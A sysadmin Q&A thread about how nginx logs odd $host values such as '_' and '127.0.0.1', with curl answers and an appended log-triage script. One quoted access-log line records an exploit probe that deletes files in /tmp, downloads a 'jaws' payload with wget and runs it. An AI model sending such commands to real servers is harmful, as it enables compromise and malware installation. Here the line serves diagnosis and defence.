```
222.187.223.158 - - [17/Feb/2022:15:41:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 444 0 "-" "Hello, world" "http://127.0.0.1"
167.248.133.47 - - [17/Feb/2022:15:45:11 +0000] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEF\xC512\xE3\xA4\x1D\xEF\xC4}bA!\x18\x08\xBC\x82X7\x12wuv\x1DD\x00\x8FYJ\xF8\xA6\x0E \x86N\xD1\xBB2z\xC7\xF5i\x96\xE6\xF5\xDB\xE3\x1F\xD5\x5C\xB1\x7F\xE8\xB2YU\xF7\x1B\xC0\xDF\xAB\x87w`?\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0" 400 150 "-" "-" "http://_"
```

I have these entries in my nginx access.log. In addition, I added `"$scheme://$host" "$server_port" "$request_body_file"` to the `log_format`.

My question is regarding how the `$host` can be set to this "_" and this "127.0.0.1" and still work?

If you understand how this happens, please could you tell me how to recreate it.

Paul
  • These requests are basically the background noise of the web. To be completely compliant with the HTTP RFC, it seems your server [should respond](https://serverfault.com/questions/1089218/is-there-a-technical-requirement-to-serve-404-responses). – Paul Feb 18 '22 at 14:14

1 Answer


Sorry, the answer is very simple:

```
curl -H "Host: anything" https://domain
```

EDIT: Also, for anyone mystified about how these entries end up in your nginx logs, try this: `curl https://example.com:80`

  • Depending on your use case, you may want to `curl` using [`--connect-to`](https://serverfault.com/a/900860/153188). – Paul Feb 18 '22 at 14:14
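
A log-triage sketch for the two cases discussed above, added here as an example and not code from the question or the answer: it parses the question's log layout and flags lines where `$host` is a client-supplied value or where a TLS handshake arrived on a plain-HTTP port. The `EXPECTED_HOSTS` names, the assumption that the catch-all server block is named `_`, and the sample lines are all constructed for illustration.

```python
import ipaddress
import re

# Question's layout: combined log format followed by "$scheme://$host".
LINE_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<request>.*)" \d{3} \d+ '
    r'"[^"]*" "[^"]*" "\w+://(?P<host>[^"]*)"'
)
EXPECTED_HOSTS = {"example.com", "www.example.com"}  # assumption: names this site serves

# Constructed sample lines (documentation IP ranges), modelled on the two in the question.
SAMPLE = [
    '203.0.113.5 - - [17/Feb/2022:15:41:02 +0000] "GET / HTTP/1.1" 444 0 "-" "curl/7.81.0" "http://127.0.0.1"',
    r'203.0.113.9 - - [17/Feb/2022:15:45:11 +0000] "\x16\x03\x01\x00\xEE\x01\x00" 400 150 "-" "-" "http://_"',
    '198.51.100.7 - - [17/Feb/2022:15:50:00 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0" "https://example.com"',
]


def classify(line):
    """Return (host, [reasons]) for one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    host, request = m["host"], m["request"]
    reasons = []
    # nginx logs non-printable bytes as \xHH; 0x16 0x03 opens a TLS handshake
    # record, i.e. an HTTPS client connected to a plain-HTTP listener.
    if request.startswith(r"\x16\x03"):
        reasons.append("tls-handshake-on-http-port")
    if host == "_":
        # No usable Host header: $host fell back to the server_name of the
        # server block that handled the request (assumed here to be "_").
        reasons.append("no-host-header")
    elif host not in EXPECTED_HOSTS:
        try:
            ipaddress.ip_address(host.strip("[]"))
            reasons.append("host-is-ip-literal")
        except ValueError:
            reasons.append("unexpected-host")
    return host, reasons


def flagged(lines):
    """Yield (host, reasons) for every parsed line with at least one reason."""
    for line in lines:
        result = classify(line)
        if result and result[1]:
            yield result


if __name__ == "__main__":
    for host, reasons in flagged(SAMPLE):
        print(f"{host!r}: {', '.join(reasons)}")
```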